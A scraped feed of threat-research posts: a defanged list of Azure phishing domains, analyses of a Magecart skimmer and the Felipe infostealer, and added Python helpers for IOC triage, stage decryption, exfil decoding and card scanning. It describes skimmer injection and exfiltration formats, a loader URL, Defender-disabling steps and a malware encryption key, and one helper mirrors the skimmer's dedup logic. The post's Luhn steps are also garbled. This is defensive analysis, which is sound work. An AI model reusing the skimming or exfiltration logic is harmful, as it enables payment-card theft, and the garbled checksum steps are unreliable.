039282fsd(.)z19(.)web(.)core(.)windows(.)net 3652adua38ea(.)z5(.)web(.)core(.)windows(.)net 378468459jjn(.)z19(.)web(.)core(.)windows(.)net 623623626638885047749469(.)z19(.)web(.)core(.)windows(.)net 86hoi2a8j592hf2(.)z14(.)web(.)core(.)windows(.)net accounhostoutlook(.)z35(.)web(.)core(.)windows(.)net accountsupdate(.)z22(.)web(.)core(.)windows(.)net adobe111(.)z19(.)web(.)core(.)windows(.)net appriver(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net bchwalletblockchain(.)z13(.)web(.)core(.)windows(.)net bitcoinwalletrecovery(.)z13(.)web(.)core(.)windows(.)net blockchainofficesupport(.)z13(.)web(.)core(.)windows(.)net blockchainrecoverywalet(.)z13(.)web(.)core(.)windows(.)net blockchaintradindinvest(.)z13(.)web(.)core(.)windows(.)net businessdrivefilesharing(.)z33(.)web(.)core(.)windows(.)net dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net dlgweu(.)blob(.)core(.)windows(.)net driveoffice-secondary(.)z13(.)web(.)core(.)windows(.)net eastexch030serverdatanet(.)z13(.)web(.)core(.)windows(.)net edustudioapp(.)z19(.)web(.)core(.)windows(.)net exchangeonline80293745(.)z27(.)web(.)core(.)windows(.)net finance51(.)z13(.)web(.)core(.)windows(.)net fukshawefwe22(.)blob(.)core(.)windows(.)net fundingmessan(.)z13(.)web(.)core(.)windows(.)net gry1asdqw1(.)blob(.)core(.)windows(.)net h0vbkkkeebweybv(.)z33(.)web(.)core(.)windows(.)net hgnghhghkkdkdh(.)z13(.)web(.)core(.)windows(.)net hp94549754083400j9302975(.)z21(.)web(.)core(.)windows(.)net hsdv(.)blob(.)core(.)windows(.)net linknec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net linkp4klg1qkni76yoz8(.)z19(.)web(.)core(.)windows(.)net lpdmsonline(.)blob(.)core(.)windows(.)net macrofinancesoftonline(.)z14(.)web(.)core(.)windows(.)net macrosoft0nlineoffice365(.)z13(.)web(.)core(.)windows(.)net mailingofficeupdate(.)z14(.)web(.)core(.)windows(.)net
mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net mailofficesecurity(.)z13(.)web(.)core(.)windows(.)net mailofficeveridiers(.)z33(.)web(.)core(.)windows(.)net mailoutlookmcrosoftupdat(.)z11(.)web(.)core(.)windows(.)net mailoutnewsecurity(.)z14(.)web(.)core(.)windows(.)net mak17opa54vjxu8(.)z7(.)web(.)core(.)windows(.)net mdj34598720843(.)z10(.)web(.)core(.)windows(.)net microexchyz42nhszseheys(.)z13(.)web(.)core(.)windows(.)net micromuze3rlokoyg(.)z14(.)web(.)core(.)windows(.)net microrel00ukelukleqwkoxl(.)z13(.)web(.)core(.)windows(.)net microsofbt50xjotm45wm7al(.)z11(.)web(.)core(.)windows(.)net microsofd8f82gtrjyaajnsj(.)z11(.)web(.)core(.)windows(.)net microsofdi3o152rpnnt2zr8(.)z11(.)web(.)core(.)windows(.)net microsoffn4xwr5df3emnh1m(.)z11(.)web(.)core(.)windows(.)net microsofn642b7o2un27wptm(.)z13(.)web(.)core(.)windows(.)net microsofq2622c5r3wpfsdnp(.)z11(.)web(.)core(.)windows(.)net microsofzwafvh6bisrici50(.)z11(.)web(.)core(.)windows(.)net offic664ghdtsgdyddux(.)z13(.)web(.)core(.)windows(.)net officcee(.)z13(.)web(.)core(.)windows(.)net office365user37773773673(.)z19(.)web(.)core(.)windows(.)net officedelist(.)z13(.)web(.)core(.)windows(.)net officefiledata(.)z13(.)web(.)core(.)windows(.)net onemailofice365(.)z13(.)web(.)core(.)windows(.)net outlookloffice365user23k-secondary(.)z14(.)web(.)core(.)windows(.)net outlookloffice365user25u-secondary(.)z33(.)web(.)core(.)windows(.)net outlookloffice365user65t-secondary(.)z6(.)web(.)core(.)windows(.)net outlookloffice365user65t(.)z6(.)web(.)core(.)windows(.)net outlookloffice365userl6m(.)z13(.)web(.)core(.)windows(.)net outlookofficecom(.)z33(.)web(.)core(.)windows(.)net outlookproctionmail(.)z9(.)web(.)core(.)windows(.)net outwebsignin2094598209(.)z21(.)web(.)core(.)windows(.)net parmalat7(.)blob(.)core(.)windows(.)net pjkiojxyfngsss(.)z13(.)web(.)core(.)windows(.)net pssastd(.)blob(.)core(.)windows(.)net rel00ukelukleqwkoxl(.)z6(.)web(.)core(.)windows(.)net 
sams2948818388301(.)z13(.)web(.)core(.)windows(.)net secureofficeportal(.)z19(.)web(.)core(.)windows(.)net sharepo7(.)z22(.)web(.)core(.)windows(.)net sharepointewk8xpzoywq7j(.)z19(.)web(.)core(.)windows(.)net supportoffices365(.)z33(.)web(.)core(.)windows(.)net thursday(.)z19(.)web(.)core(.)windows(.)net ttsokaejqumuamreio(.)z6(.)web(.)core(.)windows(.)net under12(.)z19(.)web(.)core(.)windows(.)net user111777999973sdxc(.)z11(.)web(.)core(.)windows(.)net user37377377733(.)z22(.)web(.)core(.)windows(.)net user7779793e792782(.)z14(.)web(.)core(.)windows(.)net user8877773737(.)z11(.)web(.)core(.)windows(.)net usernamewebmailsingin(.)z14(.)web(.)core(.)windows(.)net v83oybtn5zp5mmz(.)z14(.)web(.)core(.)windows(.)net validatnec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net voice88(.)z19(.)web(.)core(.)windows(.)net voicserel00ukeluklwkoxl(.)z13(.)web(.)core(.)windows(.)net webusermicr0softtonlinee(.)z33(.)web(.)core(.)windows(.)net were12(.)z19(.)web(.)core(.)windows(.)net weree(.)z6(.)web(.)core(.)windows(.)net wimdowoutlkjxjy0846335f(.)z13(.)web(.)core(.)windows(.)net yamma(.)z13(.)web(.)core(.)windows(.)net zebra11(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net fiattt(.)blob(.)core(.)windows(.)net fukshawefwe22(.)blob(.)core(.)windows(.)net gry1asdqw1(.)blob(.)core(.)windows(.)net hsdv(.)blob(.)core(.)windows(.)net parmalat7(.)blob(.)core(.)windows(.)net funksha1(.)blob(.)core(.)windows(.)net
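A triage helper for the IOC list above, added here as an example (it is not from the post and not a Zscaler tool): it refangs each indicator, recognises the two Azure endpoint shapes (zNN.web.core.windows.net static-website hosting and blob.core.windows.net), separates the "-secondary" endpoint suffix, and looks for brand fragments in the storage-account name after undoing the digit-for-letter substitutions seen in the list (micr0soft, 0nline). The brand-fragment list and the ranking are my heuristics; a legitimate business can host on these same domains, so the output is a prioritisation aid, not a block list.

```python
import re

# Storage-account names are 3-24 lowercase letters and digits; "-secondary" marks the
# read-only secondary endpoint. The zNN label varies with the account's region.
AZURE_STATIC_SITE = re.compile(
    r"^(?P<account>[a-z0-9]{3,24})(?P<secondary>-secondary)?\.z(?P<zone>\d+)\.web\.core\.windows\.net$")
AZURE_BLOB = re.compile(
    r"^(?P<account>[a-z0-9]{3,24})(?P<secondary>-secondary)?\.blob\.core\.windows\.net$")

# Brand fragments the account names in the IOC list imitate. Some are deliberately
# truncated ("microsof", "sharepo") because the 24-character limit cuts names short.
BRAND_TOKENS = ("office", "outlook", "microsof", "onedrive", "sharepo", "exchange", "adobe",
                "blockchain", "wallet", "mail", "signin", "login", "secure", "account", "valid")

# Digit-for-letter substitutions seen in the list (micr0soft, 0nline).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l"})


def refang(indicator: str) -> str:
    """Turn the defanged IOC form back into a hostname."""
    return indicator.strip().lower().replace("(.)", ".").replace("[.]", ".")


def classify(indicator: str) -> dict:
    """Identify Azure static-website or blob hosting and brand words in the account name."""
    host = refang(indicator)
    result = {"host": host, "hosting": None, "account": None, "secondary": False, "brand_tokens": []}
    for hosting, pattern in (("azure-static-website", AZURE_STATIC_SITE), ("azure-blob", AZURE_BLOB)):
        match = pattern.match(host)
        if match:
            account = match.group("account")
            normalized = account.translate(HOMOGLYPHS)
            result.update(hosting=hosting, account=account,
                          secondary=bool(match.group("secondary")),
                          brand_tokens=[t for t in BRAND_TOKENS if t in normalized])
            break
    return result


def triage(indicators) -> list:
    """Keep only Azure-hosted names and put the strongest brand lookalikes first."""
    hosted = [r for r in (classify(i) for i in indicators) if r["hosting"]]
    return sorted(hosted, key=lambda r: (-len(r["brand_tokens"]), r["host"]))


# A few entries from the IOC list above plus one legitimate Microsoft host for contrast.
SAMPLE_IOCS = [
    "onemailofice365(.)z13(.)web(.)core(.)windows(.)net",
    "mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net",
    "outlookloffice365user23k-secondary(.)z14(.)web(.)core(.)windows(.)net",
    "accountsupdate(.)z22(.)web(.)core(.)windows(.)net",
    "azaman(.)blob(.)core(.)windows(.)net",
    "login.microsoftonline.com",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_IOCS):
        print(f'{r["host"]:70} {r["hosting"]:22} {",".join(r["brand_tokens"])}')
```

The account name is the part the attacker chose, so it is the right place to look for lookalikes; the rest of the hostname, and the certificate that covers it, are Microsoft's and carry no information about intent.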
Categories: Security Posts

Magecart activity and campaign enhancements

Zscaler Research - 52 min 35 sec ago
Magecart is a hacker group known for skimming credit or debit card details by injecting malicious JavaScript code into e-commerce sites. Back in September 2018, the Zscaler ThreatLabZ research team published a blog on Magecart activity that analyzed its attack methods and evasion tactics. We are now following up on that blog to report on recent activity we have seen and some enhancements in the campaign.

Magecart attack chain

In the recent campaign, we noticed a change in the attack chain. One example is the use of heavily obfuscated JavaScript with encrypted data. Also, in some cases, the malicious JavaScript code is now injected directly into the compromised e-commerce sites, whereas in earlier attacks the malicious code was loaded from a remote host.

Fig 1: Hits of compromised websites in the last three months

1. Injecting heavily obfuscated malicious JavaScript dynamically

The credit card stealer JavaScript payload below is loaded dynamically when the victim presses the checkout button after filling the cart.

Fig 2: Heavily obfuscated malicious JavaScript code injected on the checkout page

The ThreatLabZ team's smart crawler with heuristic detection shows that various JavaScript functions in the payload are obfuscated.

Fig 3: Crawler's heuristic detection

Fig 4: Malicious script after three levels of deobfuscation by the crawler

Analysis of the skimming toolkit

The malicious script discussed above looks for the keywords "onepage|checkout|onestep|firecheckout" in the URL and, if one is found, injects another script from hxxps://dnsden[.]biz/a.js.

Fig 5: Script injected from hxxps://dnsden[.]biz

The injected obfuscated script hxxps://dnsden[.]biz/a.js contains encrypted data which is decrypted with the RC4 algorithm at runtime. RC4 here serves only to hide the next stage from static scanners: the key has to be present in a.js for the browser to decrypt it, so the stage can always be recovered from the loader itself.
Fig 6: Use of RC4 algorithm in 'a.js'

After RC4 decryption, the encrypted data in the 'a.js' script injects the main skimming script, which is responsible for extracting the victim's credit card details and sending them back to the attacker.

Encrypted data - w5rDvcOKwrnCnsKYcWHCgAcaUsOFVcOQXnZpw48KfjZ/CMObMMOiwq7Cm1XDvFDCl8KBEsKRE8Oyw6krWcK0wo1Xw7J+w6/DknoJasKVScKZOhzCoRI=

Decrypted data -

The 'universal.js' script is also obfuscated and uses the same encryption algorithm as 'a.js'. After decryption, it registers a handler on the form change event and collects all the payment information entered by the victim.

Fig 7: Collecting payment card details

Fig 8: Sends victim's credit card details to C&C

Fig 9: POST request with the stolen credit card details

info=Base64(stolen_data)&hostname=compromised_site&key=random_key

The stolen data includes billing and payment details.

Fig 10: Decoded stolen data

2. Injecting malicious JavaScript directly in the compromised site

Fig 11: Malicious JavaScript code hosted on the compromised e-commerce site is injected

Fig 12: Malicious JavaScript code hosted on a compromised site for skimming payment card details

Analysis of the skimming toolkit

The malicious JavaScript code first checks for two cookies, "$s" and "$sent"; if they are set, their values are decoded and stored in variables. These cookie values are consulted each time payment card details are entered, and updated when the details are new.

Fig 13: Getting values from the two cookie names "$s" and "$sent"

To capture payment card details, the values of all input, select and textarea elements are collected, and the script performs a basic length check on the card details.

Fig 14: Validating length of payment card details

After validating the payment card details, a hash of the card details is calculated and compared against the hashes retrieved earlier from the "$sent" cookie.
Payment details are dropped if a matching hash is found.

Fig 15: Checking the hash value of card details against data retrieved earlier from the cookie

Each time new payment card details are entered, they are sent to the attacker and the hash of those details is appended to the "$sent" cookie value; this cookie is what the script checks to decide whether the details being entered are new.

Fig 16: Value of the cookie "$sent" stored in the victim's browser

Decoding the Base64-encoded value of the "$sent" cookie above yields an array of MD5 hashes of the payment card details. By keeping these hashes in a cookie, the attacker avoids sending duplicates: each entry is checked against the cookie, and only card details not seen before are exfiltrated. For a responder, the same cookie is a client-side record of how many distinct cards were skimmed from that browser. Once all of the above checks pass, the payment card details are sent to the attacker-controlled site.

Fig 17: GET request with the stolen information

In a similar skimming toolkit, along with the cookie logic discussed above, attackers inject fake payment card fields into the compromised site and hide the legitimate fields once the victim selects credit card as the payment method.

Fig 18: Fake credit card details field and malicious JavaScript file

Fig 19: HTML code for the fake credit card details fields in the malicious script

Fig 20: Malicious script injecting the fake credit card details fields

Fig 21: Above, injected credit card fields; below, legitimate credit card fields

The injected and legitimate credit card fields look the same on screen, but the HTML input attributes (id and type) differ noticeably. In the injected fields, the card number id is "_ccnumber" and the type is "text", while in the legitimate form the card number id is "credit-card-number" and the type is "tel".
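As an added analysis example (not the skimmer's code and not from the post), the following Python collects the checks a responder needs when handling the two toolkits above: the RC4 stage decryption used by a.js and universal.js (demonstrated with a constructed key and plaintext, since the post does not publish the key), the checkout-URL keyword test, a decoder for the exfiltration body info=Base64(stolen_data)&hostname=...&key=..., the "$sent" dedup logic, and an audit of injected card fields based on the id/type differences described above. The "$sent" encoding (Base64 of a JSON array of MD5 hex digests) and the order in which card fields are joined before hashing are assumptions; the sample capture and HTML are constructed.

```python
import base64
import hashlib
import json
import re
from urllib.parse import parse_qs

CHECKOUT_PATTERN = re.compile(r"onepage|checkout|onestep|firecheckout")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_stage(blob_b64: str, key: bytes) -> str:
    """Recover the next-stage script from a Base64(RC4(script)) blob such as the one in a.js."""
    return rc4(key, base64.b64decode(blob_b64)).decode("utf-8")


# Constructed stand-ins: the real key and plaintext of a.js are not in the post.
SAMPLE_KEY = b"not-the-real-key"
SAMPLE_SCRIPT = ('(function(){var s=document.createElement("script");'
                 's.src="https://example.invalid/universal.js";document.head.appendChild(s);})();')
SAMPLE_BLOB = base64.b64encode(rc4(SAMPLE_KEY, SAMPLE_SCRIPT.encode("utf-8"))).decode("ascii")


def is_checkout_page(url: str) -> bool:
    """The loader only injects a.js when the URL carries one of these keywords."""
    return bool(CHECKOUT_PATTERN.search(url))


def decode_exfil(body: str) -> dict:
    """Decode info=Base64(stolen_data)&hostname=<site>&key=<random> from a captured POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    info = fields["info"][0].replace(" ", "+")   # a '+' arrives as a space if it was not URL-encoded
    info += "=" * (-len(info) % 4)               # restore any stripped padding
    return {"data": base64.b64decode(info).decode("utf-8", "replace"),
            "hostname": fields["hostname"][0], "key": fields["key"][0]}


# Constructed capture in the shape the post describes; 4111... is a test card number.
SAMPLE_EXFIL_BODY = ("info=" + base64.b64encode(
    b"cc_number=4111111111111111&cc_exp=12/25&bill_city=Springfield").decode("ascii")
    + "&hostname=shop.example&key=k7f2q9")


def card_fingerprint(card: dict) -> str:
    """MD5 over the card fields, as the toolkit stores in `$sent`; the join order is an assumption."""
    joined = "|".join(card[k] for k in ("number", "exp", "cvv", "name"))
    return hashlib.md5(joined.encode("utf-8")).hexdigest()


def decode_sent_cookie(value: str) -> list:
    """`$sent` is assumed to be Base64(JSON array of MD5 hex digests), the post's "MD5 array"."""
    return json.loads(base64.b64decode(value).decode("utf-8")) if value else []


def should_exfil(card: dict, sent_cookie: str) -> tuple:
    """Mirror the dedup check: send only if this card's hash is not already in `$sent`.

    Returns (send, updated cookie value).
    """
    seen = decode_sent_cookie(sent_cookie)
    fp = card_fingerprint(card)
    if fp in seen:
        return False, sent_cookie
    return True, base64.b64encode(json.dumps(seen + [fp]).encode("utf-8")).decode("ascii")


INPUT_TAG = re.compile(r"<input\b[^>]*>", re.I)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def suspicious_card_inputs(html: str) -> list:
    """Flag card-number inputs with the injected-field traits above: an id starting with '_'
    or type="text" where the legitimate field used type="tel". Calibrated to this case only."""
    hits = []
    for tag in INPUT_TAG.findall(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        field_id = attrs.get("id", "")
        if re.search(r"cc|card", field_id, re.I) and (
                field_id.startswith("_") or attrs.get("type", "text").lower() == "text"):
            hits.append(field_id)
    return hits


SAMPLE_CHECKOUT_HTML = ('<input id="_ccnumber" type="text" name="cc">'
                        '<input id="credit-card-number" type="tel" name="payment[cc_number]">')
```

Two practical notes: MD5 is the skimmer's choice, not a recommendation, and the field audit is a triage aid for the specific traits the post describes, since many legitimate checkouts also use type="text" for card numbers.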
IOCs

dnsden[.]biz
jquery-bin[.]com/gate[.]php
lumbertrans[.]com/errors/default/gate[.]php
luxbagsgirl[.]com/errors/default/gate[.]php
jsreload[.]pw/gate[.]php
saterday-race[.]com/gate[.]php
jqueryextd[.]at/gate[.]php
routingzen[.]com/gate[.]php
mz-at-shop[.]de/errors/default/gate[.]php
93[.]187[.]129[.]249/gate[.]php
developer-js[.]info/gate[.]php
google-anaiytic[.]com/fonts[.]googleapis/gate[.]php
magento-analytics[.]com/gate[.]php
gtows[.]com

Compromised sites

shop.triggerbrothers[.]com[.]au
custommagnetsdirect[.]com
lumbertrans[.]com
sunbuggy[.]com
saterday-race[.]com
windblox[.]com
cakedecoratingsolutions[.]com[.]au
network-ed[.]com[.]au
adooq[.]com
mz-at-shop[.]des
reddotarms[.]com
sprucela[.]com/
t[.]cltradingfl[.]com
worldcraftindustries[.]com
reallifecatholic[.]com
wbminternational[.]com
whistlerrides[.]ca/
smartsilk[.]com/
classictruckglass[.]com
oconnellsclothing[.]com/skin/
purefruittechnologies[.]com/
cornerstone-arch[.]com
minitruckusa[.]com
magformers[.]com
ravishingcosmetics[.]com
alamoshoes[.]com/
salonsavings[.]com/
bathroompanelsuperstore[.]com
britishfitness[.]com
bumperworksonline[.]com
niftyconcept[.]com
cornerstone-arch[.]com
decorprice[.]com

Conclusion

These new developments in an ongoing campaign illustrate some of the ways that attackers are continuously enhancing their methods for stealing sensitive information like login credentials, bank or payment card details, personally identifiable information, and so on. The Magecart campaign has been active for a long time and continues to evolve and hone its techniques to get better at stealing payment card information and related data. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from these types of attacks.
Categories: Security Posts

Felipe, a new infostealer Trojan

Zscaler Research - 52 min 35 sec ago
The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe primarily steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.

The files dropped by the malware include:

Win XP:
%UserProfile%\Local Settings\Temp\vshost.exe
%UserProfile%\Local Settings\Temp\explorer32.exe
%UserProfile%\Local Settings\Temp\install2.bat
%UserProfile%\Local Settings\Temp\infect.txt

Win7/Win10:
%UserProfile%\AppData\Local\Temp\vshost.exe
%UserProfile%\AppData\Local\Temp\explorer32.exe
%UserProfile%\AppData\Local\Temp\install2.bat
%UserProfile%\AppData\Local\Temp\infect.txt

The Felipe Trojan enumerates the system and tries to determine whether it has already been infected by checking for the files vshost32.exe and vshost64.exe on the compromised system. The parent file downloads its payloads to %UserProfile%\AppData\Local\Temp\update2804. If this folder already exists, the malware deletes the folder and the files inside it, then creates a new hidden folder with the same name.

When the update2804 folder is created, the malware downloads its different payloads with a gap of just 50 milliseconds between them. After downloading a payload, the malware copies it to a hidden folder under the system's temp directory and executes it. First it executes the install2.bat file, and then vshost.exe.
Below is the code of install2.bat:

The batch file performs registry changes responsible for the following:
- Run entries for vshost.exe and explorer32.exe to ensure persistence
- Disabling Windows Defender
- Bypassing UAC
- Excluding the temp folder path from Windows Defender scanning

Vshost.exe checks the victim's bank cards by checking a card's length or the starting digits, such as:
- American Express: number should begin with 34 or 37
- Visa: card length of 13 or 16
- Mastercard: card length of 16
- Discover: card length of 16 and beginning with 6011 or 65

Below is a snapshot of some of these instructions:

The following is the algorithm used to check a card's validity:
1. Process digits from right to left.
2. Double every alternate digit, starting from the first.
3. Break the doubled digits apart if the result is greater than 10 (e.g., 28 = 2 + 8 (10) or 19 = 1 + 9 (10)).
4. Return the 10's complement of the total.
5. Finally, verify the checksum digit. The card is invalid if the checksum is not a multiple of 10.

Snapshot of the algorithm:

If the system is already infected, the malware looks for the filename infect.txt in the temp folder. If it is already there, it sends the data below; otherwise, it sends a request to the C&C to download the file infect.txt. It also sends the victim's system information and writes “infect” in the infect.txt file.

The Felipe Trojan takes a memory dump of processes by checking the memory addresses that can store data. Basically, it scans the process memory: whenever a process starts, the system allocates enough memory for its heap, stack, and regions. However, Windows won't allocate an "entire block" of memory; it tries to allocate whatever free memory is available for user mode. The following are the methods used for the memory dump:

GetSystemInfo()
Retrieves information about the current system in a structure called SYSTEM_INFO.
This structure also contains two variables, minimumApplicationAddress and maximumApplicationAddress, which store the minimum and maximum addresses at which the system can allocate memory for user-mode applications.

VirtualQueryEx()
Gets information about a range of memory addresses and returns it in a structure named MEMORY_BASIC_INFORMATION. It tells us the range of the memory chunk that starts at the specified address.

ReadProcessMemory()
Used to read a number of bytes starting from a specific memory address.

OpenProcess()
Returns a handle to a specific process; the process must be opened before its memory can be read.

WriteProcessMemory()
Writes data to an area of memory in a specified process.

After the memory dump, the malware tries to find the victim's bank card data in memory and fetches this information to send to the C&C. Below is a snapshot of it:

Encryption method for sending data to C&C:

The malware uses the Triple Data Encryption Standard (3DES) algorithm. The first step is to create a simple wrapper class that encapsulates the 3DES algorithm and stores the encrypted data as a Base64-encoded string. That wrapper is then used to securely store private user data in a publicly accessible text file. The 3DES algorithm provides two-way encryption: the wrapper needs the private key string to generate the decrypted string. Here, the malware uses "L%f@Y7Boolean4%()F$y" as the private key. For more info: https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/…

Sending data to the C&C:

The malware uses the free “geoPlugin” web service to determine the victim's system and location information. The following are the fields the malware retrieves from the geoPlugin web service:
- System IP
- City
- Region code
- Country name

Timer set:

The malware sets a time in the program at which to shut down and restart the system on a specific day. In this sample, if the time is between 5:06 a.m. and 6:09 a.m. on a Friday, the system gets shut down.
The command to shut down is:

Interaction.Shell("shutdown /r /t 0", AppWinStyle.MinimizedFocus, false, -1);

Switches:
- /r: shut down and then restart the local computer
- /t: time, in seconds, between the execution of the shutdown command and the actual shutdown or restart
- AppWinStyle.MinimizedFocus: starts the program minimized and with focus

After the restart, the malware fetches hardware information from the victim's system, including the serial number and running processes. If the “explorer32.exe” process is not found among the running processes, the malware downloads it from the C&C and executes it from the temp folder to perform further malicious activities. It uses the GetAsyncKeyState() Win API to query the state of each key on the keyboard; from the return value of GetAsyncKeyState(), it can determine whether the key is up or down at the time the function is called.

Network communication:

Indicators of Compromise:

Filename        MD5
vshost.exe      15CE8F849FFF4CC8675900EC838A93F9
down.exe        61B06E49D514F3DC5BE4F4EF08F6B43C
explorer32.exe  D912771C8CD5720AD835E08EB80A77B6
install2.bat    7D016A3BB29904A6E00161694FC6AB4E

Download URLs:
192.99.215[.]95/uploads
Inmemory[.]tech
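The card-validation steps described earlier in this post (length and leading-digit rules per brand, then a mod-10 checksum) are the same checks a defender uses in a data-loss-prevention scan of a process dump or a suspicious outbound request. The following Python script is an added illustration, not the Trojan's code and not from Zscaler: it finds digit runs in a text buffer, applies the mod-10 (Luhn) checksum, and classifies the brand using the rules the post lists. The Visa leading-4 and Mastercard 51-55 prefix rules are an assumption added beyond the post, which only gives lengths for those two brands; the sample buffer is constructed from publicly known test card numbers.

```python
"""DLP-style scan for payment card numbers using the checks described in the post.

Added example, not the Trojan's code and not from Zscaler. Assumptions: the Visa
leading-4 and Mastercard 51-55 prefix rules are added beyond the post (which gives only
lengths for those brands); SAMPLE_BUFFER is constructed from public test card numbers.
"""
import re


def luhn_valid(number):
    """Mod-10 checksum: from the right, double every second digit (subtracting 9 when the
    product exceeds 9, which equals adding its two digits) and require a multiple of 10."""
    if not number.isdigit():
        return False
    total = 0
    for position, ch in enumerate(reversed(number)):
        digit = int(ch)
        if position % 2 == 1:          # alternate digits, starting right of the check digit
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


def card_brand(number):
    """Classify by the length/prefix rules listed in the post (Visa/MC prefixes assumed)."""
    n = len(number)
    if number.startswith(("34", "37")):
        return "American Express"                 # post: begins with 34 or 37
    if n == 16 and number.startswith(("6011", "65")):
        return "Discover"                         # post: length 16, begins 6011 or 65
    if n == 16 and "51" <= number[:2] <= "55":
        return "Mastercard"                       # post: length 16; 51-55 prefix assumed
    if n in (13, 16) and number.startswith("4"):
        return "Visa"                             # post: length 13 or 16; leading 4 assumed
    return None


# 13-16 digits, optionally separated by single spaces or dashes, not embedded in a longer run.
_PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,15}\d(?!\d)")


def scan_for_card_numbers(text):
    """Return (brand, number) for each Luhn-valid, brand-matching digit run found in text."""
    hits = []
    for match in _PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group())
        if luhn_valid(digits):
            brand = card_brand(digits)
            if brand:
                hits.append((brand, digits))
    return hits


# Constructed buffer: public test numbers, one bad checksum, and a 13-digit non-card number.
SAMPLE_BUFFER = (
    "order=20190512-0042&name=J. Doe\n"
    "Card: 4111 1111 1111 1111 exp 12/22\n"
    "amex=378282246310005\n"
    "mc=5555-5555-5555-4444\n"
    "disc=6011111111111117\n"
    "bad_checksum=4111111111111112\n"
    "phone=1234567890123\n"
)

if __name__ == "__main__":
    for brand, number in scan_for_card_numbers(SAMPLE_BUFFER):
        print(f"{brand:16} {number}")
```

The regex deliberately refuses runs longer than 16 digits, so order numbers and serials are not split into false positives; the checksum then removes most random 13-16 digit strings before the brand rules are applied.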
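The dropped-file names, temp-folder paths and MD5s above can be turned into a simple host sweep. The following Python script is an added example (not Zscaler's tooling): it lists a temp directory, flags files whose names match the dropped files, hashes them against the MD5s from the IoC table, and reports the update2804 staging folder. The demo builds a constructed temp directory with dummy files, so it reports name matches only; on a real host pass the path returned by default_temp_dir() to sweep_temp_dir().

```python
"""Sweep a temp directory for the Felipe artifacts named in the post's IoC table.

Added example, not Zscaler's code. The hashes and file names come from the post; the
demo directory and its dummy file contents are constructed.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# File names and MD5s from the post's Indicators of Compromise table.
FELIPE_HASHES = {
    "vshost.exe": "15ce8f849fff4cc8675900ec838a93f9",
    "down.exe": "61b06e49d514f3dc5be4f4ef08f6b43c",
    "explorer32.exe": "d912771c8cd5720ad835e08eb80a77b6",
    "install2.bat": "7d016a3bb29904a6e00161694fc6ab4e",
}
# Other dropped-file names from the post (no hashes given): the infection marker and the
# 32/64-bit copies the Trojan checks for.
FELIPE_NAMES = {"infect.txt", "vshost32.exe", "vshost64.exe"}
STAGING_FOLDER = "update2804"   # hidden payload folder created under the temp directory


def md5_of(path):
    """MD5 of a file, read in chunks so large files do not need to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep_temp_dir(temp_dir):
    """Return sorted (name, verdict) pairs for Felipe artifacts found directly in temp_dir."""
    findings = []
    for entry in Path(temp_dir).iterdir():
        name = entry.name.lower()
        if entry.is_dir():
            if name == STAGING_FOLDER:
                findings.append((entry.name, "staging folder present"))
        elif name in FELIPE_HASHES:
            verdict = "MD5 match" if md5_of(entry) == FELIPE_HASHES[name] else "name match only"
            findings.append((entry.name, verdict))
        elif name in FELIPE_NAMES:
            findings.append((entry.name, "name match only"))
    return sorted(findings)


def default_temp_dir():
    """%TEMP% on Windows 7/10 (the post's AppData\\Local\\Temp path); tempfile's choice elsewhere."""
    return os.environ.get("TEMP") or tempfile.gettempdir()


def demo():
    """Sweep a constructed temp directory holding dummy files (hashes deliberately do not match)."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "vshost.exe").write_bytes(b"dummy content, not the real sample")
        Path(d, "infect.txt").write_text("infect")
        Path(d, STAGING_FOLDER).mkdir()
        Path(d, "unrelated.log").write_text("nothing to see")
        return sweep_temp_dir(d)


if __name__ == "__main__":
    for name, verdict in demo():
        print(f"{name:16} {verdict}")
```

A "name match only" verdict is still worth triage: the post notes that the Trojan writes "infect" to infect.txt after the first run, and a legitimate vshost.exe (the Visual Studio hosting process) would not normally sit in a user's temp folder.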

Top exploit kit activity roundup – Spring 2019

Zscaler Research - 52 min 35 sec ago
This is the tenth in a series of quarterly roundups by the Zscaler ThreatLabZ research team in which we collect and analyze the activity of the top exploit kits over the last three months. Exploit kits (EKs) are rapidly deployable software packages designed to leverage vulnerabilities in web browsers and deliver a malicious payload to a victim’s computer. Authors of EKs offer their services for a fee, distributing malware for other malicious actors. What follows are highlights from the EK activity we observed during the last quarter.

RIG EK

